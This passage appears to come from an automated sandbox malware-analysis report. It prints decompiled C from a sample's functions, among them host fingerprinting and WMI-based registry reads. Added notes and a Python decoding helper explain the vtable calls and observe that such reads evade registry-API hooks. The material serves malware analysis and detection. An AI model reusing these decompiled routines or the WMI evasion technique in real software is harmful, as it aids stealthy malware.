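 * spaces/tabs that follows it. Only a space starts a cut, so a tab between
 * two words does not split them. Returns the number of tokens stored;
 * *slots receives the allocated capacity. The loop writes no terminating
 * NULL; unused slots are NULL only because calloc zero-fills. Caller frees *out. */
size_t split_args(char *s, char ***out, size_t *slots)
{
    size_t cap = 1;
    for (const char *p = strchr(s, ' '); p != NULL; p = strchr(p + 1, ' ')) cap++;
    *out = NULL;
    *slots = cap;
    char **arr = calloc(cap, sizeof *arr);
    if (arr == NULL) return 0;
    trim_inplace(s);
    size_t n = 0;
    char *q;
    do {
        q = strchr(s, ' ');
        if (q != NULL) {
            *q = '\0';                                   /* terminate current token */
            do { q++; } while (*q == ' ' || *q == '\t'); /* skip the separator run */
        }
        arr[n++] = s;   /* never exceeds cap: each extra token consumed one counted space */
        s = q;
    } while (q != NULL);
    *out = arr;
    return n;
}

int main(void)
{
    char line[] = "  cmd  arg1 \targ2\t";   /* constructed input */
    char **argv;
    size_t slots;
    size_t n = split_args(line, &argv, &slots);
    printf("%zu tokens in %zu slots\n", n, slots);
    for (size_t i = 0; i < n; i++) printf("  [%zu] '%s'\n", i, argv[i]);
    free(argv);
    return 0;
}
```

            For detection work the relevant consequence is the tab behaviour: a value such as "a\tb" reaches the consumer as a single argument, while "a \tb" becomes two.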

            APIs
            • ___initmbctable.LIBCMT ref: 0040F57F
              • Part of subcall function 00410330: __setmbcp.LIBCMT ref: 0041033B
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.509538367.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID: ___initmbctable__setmbcp
            • String ID:
            • API String ID: 2112888233-3916222277
            • Opcode ID: 68f949c2c55029241f175aefdf2374c2a52686099cbe676960ad780aa8636ba8
            • Instruction ID: b119f28ca3ceabddb3565d55078709d5e9eb7dd16c3fed682e25218ba2407311
            • Opcode Fuzzy Hash: 68f949c2c55029241f175aefdf2374c2a52686099cbe676960ad780aa8636ba8
            • Instruction Fuzzy Hash: D7410472808204AFEB318F249C04B577BA5AF51364F24493BE841A36E2E77E4C4AC75D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 75%
            			E007E790B(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
            				void* _v8;
            				void* __esi;
            				intOrPtr* _t35;
            				void* _t40;
            				intOrPtr* _t41;
            				intOrPtr* _t43;
            				intOrPtr* _t45;
            				intOrPtr* _t50;
            				intOrPtr* _t52;
            				void* _t54;
            				intOrPtr* _t55;
            				intOrPtr* _t57;
            				intOrPtr* _t61;
            				intOrPtr* _t65;
            				intOrPtr _t68;
            				void* _t72;
            				void* _t75;
            				void* _t76;
            
            				_t55 = _a4;
            				_t35 =  *((intOrPtr*)(_t55 + 4));
            				_a4 = 0;
            				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
            				if(_t76 < 0) {
            					L18:
            					return _t76;
            				}
            				_t40 = E007E4358(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
            				_t76 = _t40;
            				if(_t76 >= 0) {
            					_t61 = _a28;
            					if(_t61 != 0 &&  *_t61 != 0) {
            						_t52 = _v8;
            						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
            					}
            					if(_t76 >= 0) {
            						_t43 =  *_t55;
            						_t68 =  *0x7ea348; // 0x272d5a8
            						_t20 = _t68 + 0x7eb270; // 0x740053
            						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
            						if(_t76 >= 0) {
            							_t76 = E007E4984(_a4);
            							if(_t76 >= 0) {
            								_t65 = _a28;
            								if(_t65 != 0 &&  *_t65 == 0) {
            									_t50 = _a4;
            									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
            								}
            							}
            						}
            						_t45 = _a4;
            						if(_t45 != 0) {
            							 *((intOrPtr*)( *_t45 + 8))(_t45);
            						}
            						_t57 = __imp__#6;
            						if(_a20 != 0) {
            							 *_t57(_a20);
            						}
            						if(_a12 != 0) {
            							 *_t57(_a12);
            						}
            					}
            				}
            				_t41 = _v8;
            				 *((intOrPtr*)( *_t41 + 8))(_t41);
            				goto L18;
            			}

            Instruction addresses, one per decompiled statement above: 0x007e7911 0x007e7914 0x007e7924 0x007e792d 0x007e7931 0x007e79ff 0x007e7a05 0x007e7a05 0x007e794b 0x007e7950 0x007e7954 0x007e795a 0x007e795f 0x007e7966 0x007e7975 0x007e7975 0x007e7979 0x007e797b 0x007e7987 0x007e7992 0x007e799d 0x007e79a1 0x007e79ab 0x007e79af 0x007e79b1 0x007e79b6 0x007e79bd 0x007e79cd 0x007e79cd 0x007e79b6 0x007e79af 0x007e79cf 0x007e79d4 0x007e79d9 0x007e79d9 0x007e79dc 0x007e79e5 0x007e79ea 0x007e79ea 0x007e79ef 0x007e79f4 0x007e79f4 0x007e79ef 0x007e7979 0x007e79f6 0x007e79fc 0x00000000

            APIs
              • Part of subcall function 007E4358: SysAllocString.OLEAUT32(80000002), ref: 007E43B5
              • Part of subcall function 007E4358: SysFreeString.OLEAUT32(00000000), ref: 007E441B
            • SysFreeString.OLEAUT32(?), ref: 007E79EA
            • SysFreeString.OLEAUT32(007E4D42), ref: 007E79F4
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: String$Free$Alloc
            • String ID:
            • API String ID: 986138563-0
            • Opcode ID: 58a2bd5eca70f526a3fbe29eb1563566c81d04d98b7f2defd6013313bbe649e5
            • Instruction ID: 4a2ac93ef1376db423748be1a023bf2814c912fb56f162ed78e4f6f4edd5e117
            • Opcode Fuzzy Hash: 58a2bd5eca70f526a3fbe29eb1563566c81d04d98b7f2defd6013313bbe649e5
            • Instruction Fuzzy Hash: 34314872500199EFCF15DF59C888CABBB7AFF8D7407144658F8059B211D335AD91CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0040139F() {
            				char _v16;
            				intOrPtr _v28;
            				void _v32;
            				void* _v36;
            				intOrPtr _t15;
            				void* _t16;
            				void* _t24;
            				long _t25;
            				int _t26;
            				void* _t30;
            				intOrPtr* _t32;
            				signed int _t35;
            				intOrPtr _t38;
            
            				_t15 =  *0x404184;
            				if( *0x40416c > 5) {
            					_t16 = _t15 + 0x40513c;
            				} else {
            					_t16 = _t15 + 0x40529c;
            				}
            				E00401D3C(_t16, _t16);
            				_t35 = 6;
            				memset( &_v32, 0, _t35 << 2);
            				_t24 = E00401882( &_v32,  &_v16,  *0x404180 ^ 0xdd0210cf); // executed
            				if(_t24 == 0) {
            					_t25 = 0xb;
            				} else {
            					_t26 = lstrlenW( *0x404178);
            					_t8 = _t26 + 2; // 0x2
            					_t11 = _t26 + _t8 + 8; // 0xa
            					_t30 = E004015B0(_t38, _t11,  &_v32,  &_v36); // executed
            					if(_t30 == 0) {
            						_t32 = _v36;
            						 *_t32 = 0;
            						if( *0x404178 == 0) {
            							 *((short*)(_t32 + 4)) = 0;
            						} else {
            							L00401FE6(_t32 + 4);
            						}
            					}
            					_t25 = E004012FB(_v28); // executed
            				}
            				ExitThread(_t25);
            			}

            Instruction addresses, one per decompiled statement above: 0x004013a5 0x004013b6 0x004013c0 0x004013b8 0x004013b8 0x004013b8 0x004013c7 0x004013d0 0x004013d5 0x004013ec 0x004013f3 0x00401450 0x004013f5 0x004013fb 0x00401401 0x0040140f 0x00401413 0x0040141a 0x00401422 0x00401426 0x0040142e 0x0040143f 0x00401430 0x00401436 0x00401436 0x0040142e 0x00401447 0x00401447 0x00401452

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: ExitThreadlstrlen
            • String ID:
            • API String ID: 2636182767-0
            • Opcode ID: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
            • Instruction ID: 2b8b17c81bcefa181eed95ac27ced154ec6146dfe98fb58ff2424010aaaeeb75
            • Opcode Fuzzy Hash: ac67e65bd4c915eb781d54c6f39458c359880d29bbf57a3e932865a973960b97
            • Instruction Fuzzy Hash: A511E271504205ABE700EB61DD48E5B77ECAF84314F00493BB941F72B1EB38EA448B5A
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008558F7
            • Module32First.KERNEL32(00000000,00000224), ref: 00855917
            Memory Dump Source
            • Source File: 00000000.00000002.509856527.0000000000850000.00000040.00000020.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_850000_server.jbxd
            Yara matches
            Similarity
            • API ID: CreateFirstModule32SnapshotToolhelp32
            • String ID:
            • API String ID: 3833638111-0
            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
            • Instruction ID: e7d13428d0550b5d6a0b6d1bd27d335dff14fef4c3107471bd5d0be5079fa796
            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
            • Instruction Fuzzy Hash: 5CF06232100B15ABD7202AF9A89DB6B76E8FF49726F100528EA52D24C0DA74E9494661
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 37%
            			E007E472F(void* __ecx) {
            				signed int _v8;
            				void* _t15;
            				void* _t19;
            				void* _t20;
            				void* _t22;
            				intOrPtr* _t23;
            
            				_t23 = __imp__;
            				_t20 = 0;
            				_v8 = _v8 & 0;
            				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
            				_t10 = _v8;
            				if(_v8 != 0) {
            					_t20 = E007E33DC(_t10 + 1);
            					if(_t20 != 0) {
            						_t15 =  *_t23(3, _t20,  &_v8); // executed
            						if(_t15 != 0) {
            							 *((char*)(_v8 + _t20)) = 0;
            						} else {
            							E007E61DA(_t20);
            							_t20 = 0;
            						}
            					}
            				}
            				return _t20;
            			}

            Instruction addresses, one per decompiled statement above: 0x007e4734 0x007e473f 0x007e4741 0x007e4747 0x007e4749 0x007e474e 0x007e4757 0x007e475b 0x007e4764 0x007e4768 0x007e4777 0x007e476a 0x007e476b 0x007e4770 0x007e4770 0x007e4768 0x007e475b 0x007e4780

            APIs
            • GetComputerNameExA.KERNELBASE(00000003,00000000,007E3DCD,00000000,00000000,?,7491C740,007E3DCD), ref: 007E4747
              • Part of subcall function 007E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,007E62F6), ref: 007E33E8
            • GetComputerNameExA.KERNELBASE(00000003,00000000,007E3DCD,007E3DCE,?,7491C740,007E3DCD), ref: 007E4764
              • Part of subcall function 007E61DA: RtlFreeHeap.NTDLL(00000000,00000000,007E6383,00000000,?,00000000,00000000), ref: 007E61E6
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: ComputerHeapName$AllocateFree
            • String ID:
            • API String ID: 187446995-0
            • Opcode ID: 85be9cdc9d07a4aea8b344a8cd8ea4f12998df34b2f38dee539610f56181a08a
            • Instruction ID: 608b527f5f4d594661652dcded30fb49563447dfb81556dd073594150ec46e5e
            • Opcode Fuzzy Hash: 85be9cdc9d07a4aea8b344a8cd8ea4f12998df34b2f38dee539610f56181a08a
            • Instruction Fuzzy Hash: 93F0B43660119AFAEB11D6ABCC49EAF3AACEBC9745F500055E904D3140EB74DE0186B0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E007E5006(signed int __edx, intOrPtr _a4) {
            				void* _t3;
            				void* _t5;
            				void* _t7;
            				void* _t8;
            				void* _t9;
            				signed int _t10;
            
            				_t10 = __edx;
            				_t3 = HeapCreate(0, 0x400000, 0); // executed
            				 *0x7ea2d8 = _t3;
            				if(_t3 == 0) {
            					_t8 = 8;
            					return _t8;
            				}
            				 *0x7ea1c8 = GetTickCount();
            				_t5 = E007E54D8(_a4);
            				if(_t5 == 0) {
            					_t5 = E007E213E(_t9, _a4); // executed
            					if(_t5 == 0) {
            						if(E007E6392(_t9) != 0) {
            							 *0x7ea300 = 1; // executed
            						}
            						_t7 = E007E2523(_t10); // executed
            						return _t7;
            					}
            				}
            				return _t5;
            			}

            Instruction addresses, one per decompiled statement above: 0x007e5006 0x007e500f 0x007e5015 0x007e501c 0x007e5020 0x00000000 0x007e5020 0x007e502d 0x007e5032 0x007e5039 0x007e503f 0x007e5046 0x007e504f 0x007e5051 0x007e5051 0x007e505b 0x00000000 0x007e505b 0x007e5046 0x007e5060

            APIs
            • HeapCreate.KERNELBASE(00000000,00400000,00000000,007E107E,?), ref: 007E500F
            • GetTickCount.KERNEL32 ref: 007E5023
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: CountCreateHeapTick
            • String ID:
            • API String ID: 2177101570-0
            • Opcode ID: e9454b91b76541c69d16ff5058a30bb5007997bc0d93a932abc896c05ccb9819
            • Instruction ID: 41791b611b9b4f7a92792d27ddc289bec8ab571b2653eee1b520c6bf93a85af8
            • Opcode Fuzzy Hash: e9454b91b76541c69d16ff5058a30bb5007997bc0d93a932abc896c05ccb9819
            • Instruction Fuzzy Hash: 7BF02B31243BC9E9DB612B339C9970536946F5C708F50C024F901D8092EB7CD8009A29
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SetErrorMode.KERNELBASE(00000400,?,?,00780223,?,?), ref: 00780E19
            • SetErrorMode.KERNELBASE(00000000,?,?,00780223,?,?), ref: 00780E1E
            Memory Dump Source
            • Source File: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_780000_server.jbxd
            Yara matches
            Similarity
            • API ID: ErrorMode
            • String ID:
            • API String ID: 2340568224-0
            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
            • Instruction ID: c37cf524c63f5757edd935c017db940ef546b67fe649cc31a07347fd0354d86c
            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
            • Instruction Fuzzy Hash: 77D0123114512877D7403A94DC09BCE7B1CDF05B62F008411FB0DD9080C774994047E5
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • RtlAllocateHeap.NTDLL(00000008,?), ref: 00410A99
            Memory Dump Source
            • Source File: 00000000.00000002.509538367.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_40f000_server.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: ccc9b60b2535d5223f35addaaa1f78a54de07b48145c451ca91b1a431c6b3d8d
            • Instruction ID: ce16d96dba39b34238c0f814864b91e47e23c4911384a1467efd66f2d7e9dac0
            • Opcode Fuzzy Hash: ccc9b60b2535d5223f35addaaa1f78a54de07b48145c451ca91b1a431c6b3d8d
            • Instruction Fuzzy Hash: 9E01B1322013159FEB289F75DC44BA737A4AFA17E0F05852BE8559A6D0DBB89CC0C798
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 34%
            			E007E2839(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
            				intOrPtr _v12;
            				void* _v18;
            				char _v20;
            				intOrPtr _t15;
            				void* _t17;
            				intOrPtr _t19;
            				void* _t23;
            
            				_v20 = 0;
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosw");
            				_t15 =  *0x7ea348; // 0x272d5a8
            				_t4 = _t15 + 0x7eb3e8; // 0x2f18990
            				_t20 = _t4;
            				_t6 = _t15 + 0x7eb174; // 0x650047
            				_t17 = E007E790B(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
            				if(_t17 < 0) {
            					_t23 = _t17;
            				} else {
            					_t23 = 8;
            					if(_v20 != _t23) {
            						_t23 = 1;
            					} else {
            						_t19 = E007E661C(_t20, _v12);
            						if(_t19 != 0) {
            							 *_a16 = _t19;
            							_t23 = 0;
            						}
            						__imp__#6(_v12);
            					}
            				}
            				return _t23;
            			}

            Instruction addresses, one per decompiled statement above: 0x007e2843 0x007e284a 0x007e284b 0x007e284c 0x007e284d 0x007e2853 0x007e2858 0x007e2858 0x007e2862 0x007e2874 0x007e287b 0x007e28a9 0x007e287d 0x007e287f 0x007e2884 0x007e28a6 0x007e2886 0x007e2889 0x007e2890 0x007e2895 0x007e2897 0x007e2897 0x007e289c 0x007e289c 0x007e2884 0x007e28b0

            APIs
              • Part of subcall function 007E790B: SysFreeString.OLEAUT32(?), ref: 007E79EA
              • Part of subcall function 007E661C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,007E4B72,004F0053,00000000,?), ref: 007E6625
              • Part of subcall function 007E661C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,007E4B72,004F0053,00000000,?), ref: 007E664F
              • Part of subcall function 007E661C: memset.NTDLL ref: 007E6663
            • SysFreeString.OLEAUT32(00000000), ref: 007E289C
            Memory Dump Source
            • Source File: 00000000.00000002.509771149.00000000007E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: true
            • Associated: 00000000.00000002.509763566.00000000007E0000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509782183.00000000007E9000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509790314.00000000007EA000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.509803700.00000000007EC000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7e0000_server.jbxd
            Similarity
            • API ID: FreeString$lstrlenmemcpymemset
            • String ID:
            • API String ID: 397948122-0
            • Opcode ID: 03ba727db47d007036e32b526c503e793e63825ed5b6c53d160d84e9f7a5b7b7
            • Instruction ID: ab93d2f09fe27ef2caad449ede85151cca821fcd34be4935ec476d1257a9ee8d
            • Opcode Fuzzy Hash: 03ba727db47d007036e32b526c503e793e63825ed5b6c53d160d84e9f7a5b7b7
            • Instruction Fuzzy Hash: AF01B172501159FFDB819FAACC44DABBBB8FF0C350F004525E902E7062E7749912C790
            Uniqueness

            Uniqueness Score: -1.00%
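E007E790B and E007E2839 above call through raw vtable offsets on two COM objects and accept a VARIANT only when its type field is 8, after which _v12 (eight bytes past the type field) is handed to a string-copy routine and released with SysFreeString. Against the IWbemServices and IWbemClassObject vtable orders from the public wbemcli.h header, offset 0x4c on the object at _a4+4 is IWbemClassObject::GetMethod, 0x14 is Put, 0x60 on the object at *_a4 is IWbemServices::ExecMethod, 0x10 is Get and 8 is Release; 0x80000002 is HKEY_LOCAL_MACHINE, 8 is VT_BSTR, and the immediates 0x740053, 0x650047 and 0x4F0053 shown beside string pointers are the first two UTF-16LE code units ("St", "Ge", "SO") of strings the report does not print. That is the GetMethod / Put / ExecMethod / Get pattern of a registry read through the StdRegProv WMI class, which is what the "Writes or reads registry keys via WMI" signature flags. The Python below is an added decoding helper, not code from the report, from Joe Sandbox or from the sample: the vtable tables come from the SDK header, the memory blob is constructed here with a flat offset standing in for a pointer, and reading the two-character prefixes as "StdRegProv" and "GetStringValue" is an inference that the page itself does not confirm.

```python
import struct

VT_BSTR = 8                      # the value E007E2839 compares the VARIANT's vt against
HKEY_LOCAL_MACHINE = 0x80000002  # hDefKey, the second argument E007E2839 passes to E007E790B

# vtable orders from wbemcli.h, IUnknown's three slots first; on x86 slot n is at byte offset n*4
IWBEM_SERVICES = (
    "QueryInterface AddRef Release OpenNamespace CancelAsyncCall QueryObjectSink "
    "GetObject GetObjectAsync PutClass PutClassAsync DeleteClass DeleteClassAsync "
    "CreateClassEnum CreateClassEnumAsync PutInstance PutInstanceAsync DeleteInstance "
    "DeleteInstanceAsync CreateInstanceEnum CreateInstanceEnumAsync ExecQuery ExecQueryAsync "
    "ExecNotificationQuery ExecNotificationQueryAsync ExecMethod ExecMethodAsync"
).split()
IWBEM_CLASS_OBJECT = (
    "QueryInterface AddRef Release GetQualifierSet Get Put Delete GetNames "
    "BeginEnumeration Next EndEnumeration GetPropertyQualifierSet Clone GetObjectText "
    "SpawnDerivedClass SpawnInstance CompareTo GetPropertyOrigin InheritsFrom GetMethod "
    "PutMethod DeleteMethod BeginMethodEnumeration NextMethod EndMethodEnumeration "
    "GetMethodQualifierSet GetMethodOrigin"
).split()


def slot_name(vtable, byte_offset):
    """Translate a decompiled '*(vtbl + 0xNN)' into the method name for that interface."""
    if byte_offset % 4:
        raise ValueError("x86 vtable slots are 4 bytes apart")
    return vtable[byte_offset // 4]


def utf16_immediate(value):
    """A 32-bit immediate the decompiler shows beside a string pointer is the string's
    first two UTF-16LE code units, e.g. 0x740053 -> 'St'."""
    return struct.pack("<I", value).decode("utf-16-le").rstrip("\0")


def read_bstr(mem, ptr):
    """BSTR layout: a 4-byte byte-length prefix sits immediately before the UTF-16LE text."""
    nbytes = struct.unpack_from("<I", mem, ptr - 4)[0]
    return mem[ptr:ptr + nbytes].decode("utf-16-le")


def variant_string(mem, variant_off):
    """Mirror the check in E007E2839: only a VT_BSTR VARIANT is accepted, and the value
    lives eight bytes after vt (the _v20 / _v12 pair in the decompiled frame)."""
    vt = struct.unpack_from("<H", mem, variant_off)[0]
    if vt != VT_BSTR:
        return None
    return read_bstr(mem, struct.unpack_from("<I", mem, variant_off + 8)[0])


def build_sample_memory(text, vt=VT_BSTR, variant_off=0x00, bstr_off=0x40):
    """Constructed memory blob (not a dump from the sample): a 16-byte VARIANT at
    variant_off whose bstrVal 'points' (flat offset, standing in for a pointer) at a BSTR."""
    data = text.encode("utf-16-le")
    mem = bytearray(0x100)
    struct.pack_into("<I", mem, bstr_off - 4, len(data))
    mem[bstr_off:bstr_off + len(data)] = data
    struct.pack_into("<H", mem, variant_off, vt)
    struct.pack_into("<I", mem, variant_off + 8, bstr_off)
    return bytes(mem)


def stdregprov_call_sequence():
    """The offsets E007E790B uses, in call order, resolved against the interface each
    object has: the object at _a4+4 is an IWbemClassObject (assumed to be the StdRegProv
    class definition), the object at *_a4 is the IWbemServices namespace connection."""
    return [
        ("IWbemClassObject", slot_name(IWBEM_CLASS_OBJECT, 0x4C)),  # fetch the method signature
        ("IWbemClassObject", slot_name(IWBEM_CLASS_OBJECT, 0x14)),  # fill an in-parameter
        ("IWbemServices", slot_name(IWBEM_SERVICES, 0x60)),         # invoke the method
        ("IWbemClassObject", slot_name(IWBEM_CLASS_OBJECT, 0x10)),  # read an out-parameter
        ("IWbemClassObject", slot_name(IWBEM_CLASS_OBJECT, 0x08)),  # drop the out-params object
    ]
```

The practical consequence for detection is that this registry read never touches the RegOpenKey/RegQueryValue family in the malware's own process; it arrives at the WMI provider host, so hooks or ETW on the registry APIs in this process see nothing, while Microsoft-Windows-WMI-Activity tracing does.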

            C-Code - Quality: 37%
            			E00401D3C(void* __eax, intOrPtr _a4) {
            
            				 *0x404190 =  *0x404190 & 0x00000000;
            				_push(0);
            				_push(0x40418c);
            				_push(1);
            				_push(_a4);
            				 *0x404188 = 0xc; // executed
            				L00401682(); // executed
            				return __eax;
            			}

            Instruction addresses, one per decompiled statement above: 0x00401d3c 0x00401d43 0x00401d45 0x00401d4a 0x00401d4c 0x00401d50 0x00401d5a 0x00401d5f

            APIs
            • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(004013CC,00000001,0040418C,00000000), ref: 00401D5A
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: DescriptorSecurity$ConvertString
            • String ID:
            • API String ID: 3907675253-0
            • Opcode ID: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
            • Instruction ID: 8b1a9882f0f7b6f5a619b3d6300b2bdd32795284b236dc0e31706888a106ff8d
            • Opcode Fuzzy Hash: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
            • Instruction Fuzzy Hash: AFC04CF4140300B7E620AB409D5AF057A5577A4715F61062DFB04391E1C3F91094952D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E004012E6(long _a4) {
            				void* _t2;
            
            				_t2 = RtlAllocateHeap( *0x404160, 0, _a4); // executed
            				return _t2;
            			}

            Instruction addresses, one per decompiled statement above: 0x004012f2 0x004012f8

            APIs
            • RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
            • Instruction ID: e72f98105ba7c706faca8ef9926cddb4ff6cd2f9e0c1ce1923eff6ceed1ee1be
            • Opcode Fuzzy Hash: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
            • Instruction Fuzzy Hash: 92B012B1100100ABCA118F11EF08F06BE31B7E4701F004030B3042407482314C20FB1D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00401BA9(void* _a4) {
            				char _t2;
            
            				_t2 = RtlFreeHeap( *0x404160, 0, _a4); // executed
            				return _t2;
            			}

            Instruction addresses, one per decompiled statement above: 0x00401bb5 0x00401bbb

            APIs
            • RtlFreeHeap.NTDLL(00000000,00000030,004017ED,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,00401A66), ref: 00401BB5
            Memory Dump Source
            • Source File: 00000000.00000002.509472273.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.509472273.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.509472273.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_server.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID:
            • API String ID: 3298025750-0
            • Opcode ID: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
            • Instruction ID: ce698fd0423bda5088509b7a42681047dd9c8e559710f82c1ef419a06116bbed
